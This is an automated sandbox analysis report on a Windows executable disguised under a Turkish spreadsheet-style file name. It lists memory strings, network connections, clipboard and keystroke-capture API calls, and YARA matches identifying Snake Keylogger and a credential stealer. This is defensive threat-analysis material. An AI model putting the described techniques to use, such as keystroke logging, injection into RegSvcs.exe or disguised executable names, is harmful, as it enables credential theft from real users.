                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.000000000277B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01014164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01014164
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01014164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01014164
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01013F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_01013F66
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0100001C
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0102CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0102CABC

                  System Summary

                  barindex
                  Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2216, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RegSvcs.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: This is a third-party compiled AutoIt script.0_2_00FA3B3A
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000000.1472217423.0000000001054000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9c41c4a5-8
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000000.1472217423.0000000001054000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3407b881-6
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_92b48fec-3
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_df0f59d9-d
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0100A1EF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FF8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FF8310
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_010051BD
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FAE6A00_2_00FAE6A0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FCD9750_2_00FCD975
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC21C50_2_00FC21C5
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD62D20_2_00FD62D2
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010203DA0_2_010203DA
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD242E0_2_00FD242E
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC25FA0_2_00FC25FA
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FB66E10_2_00FB66E1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FFE6160_2_00FFE616
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD878F0_2_00FD878F
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD68440_2_00FD6844
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FB88080_2_00FB8808
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010208570_2_01020857
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010088890_2_01008889
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FCCB210_2_00FCCB21
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD6DB60_2_00FD6DB6
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FB6F9E0_2_00FB6F9E
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FB30300_2_00FB3030
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FCF1D90_2_00FCF1D9
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC31870_2_00FC3187
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA12870_2_00FA1287
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC14840_2_00FC1484
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FB55200_2_00FB5520
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC76960_2_00FC7696
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FB57600_2_00FB5760
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC19780_2_00FC1978
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FD9AB50_2_00FD9AB5
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FAFCE00_2_00FAFCE0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01027DDB0_2_01027DDB
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FCBDA60_2_00FCBDA6
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FC1D900_2_00FC1D90
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FB3FE00_2_00FB3FE0
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FADF000_2_00FADF00
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01261BA80_2_01261BA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247D2782_2_0247D278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_024753622_2_02475362
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247A0882_2_0247A088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247C1462_2_0247C146
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247C7382_2_0247C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247C46C2_2_0247C46C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247CA082_2_0247CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247E9882_2_0247E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_024769A02_2_024769A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02473E092_2_02473E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02476FC82_2_02476FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247CFAA2_2_0247CFAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247CCD82_2_0247CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247F6442_2_0247F644
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247FA882_2_0247FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02473AA12_2_02473AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0247E97A2_2_0247E97A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_024729EC2_2_024729EC
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: String function: 00FC0AE3 appears 70 times
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: String function: 00FC8900 appears 42 times
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: String function: 00FA7DE1 appears 35 times
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003B63000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1480527876.0000000003D0D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
